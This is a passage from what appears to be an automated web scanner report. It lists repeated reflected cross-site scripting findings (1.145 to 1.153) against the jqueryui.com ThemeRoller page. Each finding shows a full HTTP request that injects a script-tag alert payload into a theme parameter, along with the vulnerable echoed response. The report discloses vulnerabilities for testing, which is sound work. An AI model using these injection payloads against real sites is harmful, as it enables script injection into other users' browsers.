GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a4a776"><script>alert(1)</script>659f328534c&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a4a776"><script>alert(1)</script>659f328534c&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

1.145. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b0e"><script>alert(1)</script>698c2ece447 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaa4b0e"><script>alert(1)</script>698c2ece447&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaa4b0e"><script>alert(1)</script>698c2ece447&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e
...[SNIP]...

1.146. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9653f"><script>alert(1)</script>08fffe5d166 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa19653f"><script>alert(1)</script>08fffe5d166&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa19653f"><script>alert(1)</script>08fffe5d166&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

1.147. http://jqueryui.com/themeroller/ [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6ee9"><script>alert(1)</script>808af5a1e60 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999e6ee9"><script>alert(1)</script>808af5a1e60&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999e6ee9"><script>alert(1)</script>808af5a1e60&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgT
...[SNIP]...

1.148. http://jqueryui.com/themeroller/ [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e82d4"><script>alert(1)</script>74d896ec235 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxe82d4"><script>alert(1)</script>74d896ec235&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxe82d4"><script>alert(1)</script>74d896ec235&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

1.149. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3f65"><script>alert(1)</script>0db52cdcee0 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxd3f65"><script>alert(1)</script>0db52cdcee0 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:27:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxd3f65"><script>alert(1)</script>0db52cdcee0" type="text/css" media="all" />
...[SNIP]...

1.150. http://jqueryui.com/themeroller/ [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a38c7"><script>alert(1)</script>8771107acaa was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121a38c7"><script>alert(1)</script>8771107acaa&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121a38c7"><script>alert(1)</script>8771107acaa&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

1.151. http://jqueryui.com/themeroller/ [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f066a"><script>alert(1)</script>31ec4226d13 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222f066a"><script>alert(1)</script>31ec4226d13&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222f066a"><script>alert(1)</script>31ec4226d13&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover
...[SNIP]...

1.152. http://jqueryui.com/themeroller/ [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4e5f"><script>alert(1)</script>a1c0288782c was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555b4e5f"><script>alert(1)</script>a1c0288782c&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
pacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555b4e5f"><script>alert(1)</script>a1c0288782c&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.
...[SNIP]...

1.153. http://jqueryui.com/themeroller/ [fcError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d63a"><script>alert(1)</script>02028214c2d was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a6d63a"><script>alert(1)</script>02028214c2d&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-